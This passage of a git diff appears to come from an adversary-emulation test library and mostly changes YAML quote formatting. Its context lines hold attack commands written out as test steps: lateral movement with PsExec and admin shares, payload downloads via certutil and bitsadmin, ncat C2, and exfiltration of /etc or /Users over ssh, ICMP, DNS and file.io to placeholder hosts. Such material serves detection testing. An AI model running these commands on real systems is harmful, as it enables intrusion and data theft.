Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -72087,7 +72087,7 @@ lateral-movement:
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1021.001:
@@ -72159,7 +72159,7 @@ lateral-movement:
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
description: 'Attempt an RDP session via Remote Desktop Application to a DomainController.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72182,15 +72182,15 @@ lateral-movement:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{ exit 0} else { exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
$Server=#{logonserver}
@@ -72207,7 +72207,7 @@ lateral-movement:
auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
description: 'Attempt an RDP session via Remote Desktop Application over Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72240,7 +72240,7 @@ lateral-movement:
description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application
over Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72264,7 +72264,7 @@ lateral-movement:
auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
description: 'Changing RDP Port to Non Standard Port via Command_Prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72585,7 +72585,7 @@ lateral-movement:
auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
description: 'Connecting To Remote Shares
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72609,13 +72609,13 @@ lateral-movement:
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
-'
+ '
name: command_prompt
- name: Map Admin Share PowerShell
auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
description: 'Map Admin share utilizing PowerShell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72634,14 +72634,14 @@ lateral-movement:
executor:
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
-'
+ '
name: powershell
- name: Copy and Execute File with PsExec
auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
description: 'Copies a file to a remote host and executes it using PsExec. Requires
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72662,10 +72662,10 @@ lateral-movement:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -72695,7 +72695,7 @@ lateral-movement:
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1021.004:
@@ -72928,7 +72928,7 @@ lateral-movement:
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72944,10 +72944,10 @@ lateral-movement:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
-'
+ '
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -73305,7 +73305,7 @@ lateral-movement:
executor:
command: 'Enable-PSRemoting -Force
-'
+ '
name: powershell
elevation_required: true
- name: Invoke-Command
@@ -73328,7 +73328,7 @@ lateral-movement:
executor:
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-'
+ '
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -73689,7 +73689,7 @@ command-and-control:
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
-QuickTimeout}
-'
+ '
name: powershell
- name: DNS Regular Beaconing
auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
@@ -74487,7 +74487,7 @@ command-and-control:
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
description: 'Utilize rsync to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74511,13 +74511,13 @@ command-and-control:
executor:
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
-'
+ '
name: bash
- name: rsync remote file copy (pull)
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
description: 'Utilize rsync to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74541,13 +74541,13 @@ command-and-control:
executor:
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
-'
+ '
name: bash
- name: scp remote file copy (push)
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
description: 'Utilize scp to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74571,13 +74571,13 @@ command-and-control:
executor:
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
-'
+ '
name: bash
- name: scp remote file copy (pull)
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
description: 'Utilize scp to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74601,13 +74601,13 @@ command-and-control:
executor:
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
-'
+ '
name: bash
- name: sftp remote file copy (push)
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
description: 'Utilize sftp to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74631,13 +74631,13 @@ command-and-control:
executor:
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
-'
+ '
name: bash
- name: sftp remote file copy (pull)
auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef'
description: 'Utilize sftp to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74661,14 +74661,14 @@ command-and-control:
executor:
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
-'
+ '
name: bash
- name: certutil download (urlcache)
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74683,17 +74683,17 @@ command-and-control:
executor:
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
-'
+ '
cleanup_command: 'del #{local_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: certutil download (verifyctl)
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74715,7 +74715,7 @@ command-and-control:
cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - BITSAdmin BITS Download
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
@@ -74741,7 +74741,7 @@ command-and-control:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
-'
+ '
name: command_prompt
- name: Windows - PowerShell Download
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
@@ -74763,17 +74763,17 @@ command-and-control:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
-'
+ '
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: OSTAP Worming Activity
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74850,7 +74850,7 @@ command-and-control:
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
description: 'Download a remote file using the whois utility
-'
+ '
supported_platforms:
- linux
- macos
@@ -74878,29 +74878,29 @@ command-and-control:
dependencies:
- description: 'The whois and timeout commands must be present
-'
+ '
prereq_command: 'which whois && which timeout
-'
+ '
get_prereq_command: 'echo "Please install timeout and the whois package"
-'
+ '
executor:
name: sh
elevation_required: false
command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
#{remote_port} "#{query}" > #{output_file}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: File Download via PowerShell
auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
description: 'Use PowerShell to download and write an arbitrary file from the
internet. Example is from the 2021 Threat Detection Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74934,7 +74934,7 @@ command-and-control:
name: command_prompt
command: 'finger base64_filedata@#{remote_host}
-'
+ '
- name: Download a file with IMEWDBLD.exe
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
description: |
@@ -74982,10 +74982,10 @@ command-and-control:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -75028,10 +75028,10 @@ command-and-control:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -75040,13 +75040,13 @@ command-and-control:
Remove-Item $env:temp\curl.zip
- description: 'A file must be created to upload
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path}
-'
+ '
executor:
command: |
#{curl_path} -T #{file_path} #{remote_destination}
@@ -75144,7 +75144,7 @@ command-and-control:
executor:
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
-'
+ '
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -75397,31 +75397,31 @@ command-and-control:
dependencies:
- description: 'The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
-'
+ '
prereq_command: 'if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: 'The Psiphon executable must exist in the Downloads folder
-'
+ '
prereq_command: 'if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe"
"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
-'
+ '
executor:
name: powershell
command: 'PathToAtomicsFolder\T1090.003\src\Psiphon.bat
-'
+ '
cleanup_command: "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction
Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet
Settings' -Name \"ProxyServer\" -Value $Proxy}\n"
@@ -75444,7 +75444,7 @@ command-and-control:
- description: "tor.exe must be installed on the machine \n"
prereq_command: 'if (Test-Path #{TorExe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
@@ -75469,15 +75469,15 @@ command-and-control:
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi
-'
+ '
get_prereq_command: 'sudo apt-get -y install tor
-'
+ '
executor:
command: "sudo systemctl start tor \n"
cleanup_command: 'sudo systemctl stop tor
-'
+ '
name: sh
- name: Tor Proxy Usage - MacOS
auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
@@ -75493,17 +75493,17 @@ command-and-control:
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi
-'
+ '
get_prereq_command: |
if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor
executor:
command: 'osascript -e ''tell application "Terminal" to do script "tor"''
-'
+ '
cleanup_command: 'killall tor > /dev/null 2>&1
-'
+ '
name: sh
T1026:
technique:
@@ -75657,10 +75657,10 @@ command-and-control:
dependencies:
- description: 'ncat.exe must be available at specified location (#{ncat_exe})
-'
+ '
prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
@@ -75674,7 +75674,7 @@ command-and-control:
executor:
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
-'
+ '
name: powershell
- name: Powercat C2
auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
@@ -75823,13 +75823,13 @@ command-and-control:
executor:
command: 'Test-NetConnection -ComputerName #{domain} -port #{port}
-'
+ '
name: powershell
- name: Testing usage of uncommonly used port
auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767
description: 'Testing uncommonly used port utilizing telnet.
-'
+ '
supported_platforms:
- linux
- macos
@@ -75845,7 +75845,7 @@ command-and-control:
executor:
command: 'telnet #{domain} #{port}
-'
+ '
name: sh
T1102.003:
technique:
@@ -76087,7 +76087,7 @@ command-and-control:
-Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content
}
-'
+ '
name: powershell
- name: DNS over HTTPS Regular Beaconing
auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b
@@ -76277,7 +76277,7 @@ command-and-control:
and using this to maintain access to the machine. Download of TeamViewer installer
will be at the destination location when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76298,7 +76298,7 @@ command-and-control:
and use to establish C2. Download of AnyDesk installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76317,7 +76317,7 @@ command-and-control:
and use to establish C2. Download of LogMeIn installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76337,7 +76337,7 @@ command-and-control:
and use to establish C2. Download of GoToAssist installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76381,21 +76381,21 @@ command-and-control:
dependencies:
- description: 'Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
-'
+ '
prereq_command: 'if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe"
-Destination "$env:temp\ammyy.exe" -dynamic
-'
+ '
executor:
command: 'Start-Process #{Ammyy_Admin_Path}
-'
+ '
cleanup_command: 'Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
-'
+ '
name: powershell
elevation_required: true
- name: RemotePC Software Execution
@@ -76414,18 +76414,18 @@ command-and-control:
dependencies:
- description: 'RemotePC must exist on disk at the specified location (#{RemotePC_Path})
-'
+ '
prereq_command: 'if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe"
-Destination "#{RemotePC_Path}" -dynamic
-'
+ '
executor:
command: 'Start-Process #{RemotePC_Path}
-'
+ '
cleanup_command: "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False
-ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\"
-Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask
@@ -76497,7 +76497,7 @@ command-and-control:
auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
description: 'Utilizing a common technique for posting base64 encoded data.
-'
+ '
supported_platforms:
- macos
- linux
@@ -76803,7 +76803,7 @@ command-and-control:
- description: "Curl must be installed on system \n"
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -77008,7 +77008,7 @@ exfiltration:
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
description: 'Take a file/directory, split it into 5Mb chunks
-'
+ '
supported_platforms:
- macos
- linux
@@ -77027,12 +77027,12 @@ exfiltration:
prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else
exit 0; fi;
-'
+ '
get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path};
touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name}
bs=25000000 count=1
-'
+ '
executor:
command: |
cd #{folder_path}; split -b 5000000 #{file_name}
@@ -77040,7 +77040,7 @@ exfiltration:
cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path};
fi;
-'
+ '
name: sh
T1048:
technique:
@@ -77126,7 +77126,7 @@ exfiltration:
executor:
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
-'
+ '
name: sh
- name: Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
@@ -77156,7 +77156,7 @@ exfiltration:
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
-'
+ '
name: sh
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
@@ -77198,14 +77198,14 @@ exfiltration:
- description: 'DNSExfiltrator powershell file must exist on disk at specified
location (#{ps_module})
-'
+ '
prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1"
-OutFile #{ps_module}
-'
+ '
executor:
command: |
Import-Module #{ps_module}
@@ -77271,7 +77271,7 @@ exfiltration:
auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0
description: 'Exfiltrate data HTTPS using curl to file share site file.io
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -77287,10 +77287,10 @@ exfiltration:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -77306,7 +77306,7 @@ exfiltration:
auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01
description: 'Exfiltrate data HTTPS using curl to file share site file.io
-'
+ '
supported_platforms:
- macos
- linux
@@ -77409,7 +77409,7 @@ exfiltration:
auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932
description: 'Exfiltrates a file present on the victim machine to the C2 server.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -77666,13 +77666,13 @@ exfiltration:
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
1500, $Data) }
-'
+ '
name: powershell
- name: Exfiltration Over Alternative Protocol - DNS
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
description: 'Exfiltration of specified file over DNS protocol.
-'
+ '
supported_platforms:
- linux
executor:
@@ -77717,7 +77717,7 @@ exfiltration:
command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
-'
+ '
name: powershell
input_arguments:
input_file:
@@ -78127,7 +78127,7 @@ initial-access:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -78162,20 +78162,20 @@ initial-access:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1195.003:
technique:
object_marking_refs:
@@ -78413,7 +78413,7 @@ initial-access:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -78424,10 +78424,10 @@ initial-access:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1078.002:
@@ -78763,7 +78763,7 @@ initial-access:
description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
please see "T1133\src\list of vpn extension.txt" to view complete list
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -78776,12 +78776,12 @@ initial-access:
type: String
default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
-'
+ '
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -79173,7 +79173,7 @@ initial-access:
cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction
Ignore
-'
+ '
- name: Word spawned a command shell and used an IP address in the command line
auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f
description: |
@@ -79185,7 +79185,7 @@ initial-access:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
-'
+ '
type: String
default: C:\Users\Public\art.jse
ms_product:
@@ -79196,7 +79196,7 @@ initial-access:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -79207,7 +79207,7 @@ initial-access:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -79216,7 +79216,7 @@ initial-access:
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
-'
+ '
name: powershell
T1566.002:
technique:
diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md
index e641d3bc..d90cc8b1 100644
--- a/atomics/T1114.001/T1114.001.md
+++ b/atomics/T1114.001/T1114.001.md
@@ -55,7 +55,7 @@ if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
```